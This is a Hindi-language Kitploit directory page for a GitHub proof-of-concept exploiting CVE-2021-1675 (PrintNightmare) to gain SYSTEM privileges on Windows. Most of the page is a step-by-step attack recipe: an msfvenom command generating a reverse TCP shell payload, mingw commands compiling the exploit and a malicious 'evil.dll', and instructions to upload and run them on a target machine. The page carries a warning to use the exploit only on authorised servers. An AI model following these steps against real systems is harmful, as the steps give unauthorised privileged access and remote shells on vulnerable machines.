Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-1675 — CVE-2021-1675 (PrintNightmare) के लिए स्थानीय विशेषाधिकार वृद्धि शोषण जो कमजोर Windows सिस्टम पर SYSTEM पहुंच प्राप्त करने के लिए एक दुर्भावनापूर्ण DLL स्थापित करता है। | Kitploit
उपकरण/GitHubGitHub/andrewtrube/cve-2021-1675
विशेषाधिकार वृद्धिशोषण फ्रेमवर्कशोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट
GitHubandrewtrube/cve-2021-1675

CVE-2021-1675

CVE-2021-1675 (PrintNightmare) के लिए स्थानीय विशेषाधिकार वृद्धि शोषण जो कमजोर Windows सिस्टम पर SYSTEM पहुंच प्राप्त करने के लिए एक दुर्भावनापूर्ण DLL स्थापित करता है।

रिपॉजिटरी देखें
5154 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

PrintNightmare स्थानीय विशेषाधिकार वृद्धि PoC

src/nightmare.cpp: CVE-2021-1675 का शोषण करने और दुर्भावनापूर्ण dll स्थापित करके सिस्टम एक्सेस प्राप्त करने के लिए सोर्स कोड src/payload-dll.cpp: एंट्री फ़ंक्शन में दुर्भावनापूर्ण शेलकोड वाले dll के लिए सोर्स कोड

!!केवल उन सर्वरों के विरुद्ध उपयोग करें जिन पर आपके पास परीक्षण करने की अनुमति है

सारांश

CVE-2021-1675 Microsoft Windows की Print Spooler Service में एक कमजोरी है जो हमलावर को SeLoadDriverPrivilege जांच को बायपास करने की अनुमति देती है। इसका उपयोग लक्षित मशीन पर एक दुर्भावनापूर्ण DLL स्थापित करके विशेषाधिकार वृद्धि प्राप्त करने के लिए किया जा सकता है, जो शेलकोड को कॉल करता है या रिवर्स शेल कनेक्शन स्थापित करने के लिए Window API का उपयोग करता है। जून 8, 2021 से पहले के Windows 10/8/Server 2008/Server 2012 के संस्करण प्रभावित हैं।

POC

  1. Git रेपो डाउनलोड या क्लोन करें
  2. c में उपयुक्त पेलोड उत्पन्न करने के लिए msfvenom का उपयोग करें $ msfvenom -p windows/shell/reverse_tcp EXITFUNC=THREAD LHOST=127.0.0.1 LPORT=4444 -f c
  3. msfvenom के आउटपुट को payload-dll.cpp में वहां पेस्ट करें जहां 'change me' लिखा है
  4. मुख्य निष्पादन योग्य संकलित करें x86_64-w64-mingw32-g++-win32 -o ./src/nightmare.o -c -g -Wall ./src/nightmare.cpp x86_64-w64-mingw32-g++-win32 -o ./bin/PrintNightmareLPE.exe ./src/nightmare.o -lws2_32 -static-libgcc -static-libstdc++ -lole32 -lwinspool
  5. dll संकलित करें x86_64-w64-mingw32-g++ src/payload-dll.cpp -lws2_32 -o lib/evil.dll -shared
  6. exe और dll को संग्रहित करें, फिर संग्रह को अपनी लक्षित मशीन पर अपलोड करने का तरीका खोजें zip ./bin/PrinterNightmareLPE.exe ./lib/
  7. एक बार संग्रह लक्षित Windows मशीन पर आ जाए, तो उसे निकालें
  8. evil.dll को c:\windows\temp\evil.dll पर ले जाएं
  9. PrintNightmareLPE.exe चलाएं

नोट्स

  • यदि सब कुछ ठीक से काम कर रहा है तो शोषण Windows के प्रिंटर ड्राइवरों के माध्यम से पुनरावृत्ति करेगा और परिणाम प्रिंट करेगा
  • आप PrintNightmareLPE.exe द्वारा evil.dll को लोड करने का फ़ाइलपथ सोर्स कोड के अंदर से बदल सकते हैं
  • वर्तमान में दुर्भावनापूर्ण dll Proof-of-Concept के रूप में केवल calc.exe लोड करता है
टूल डाउनलोड करें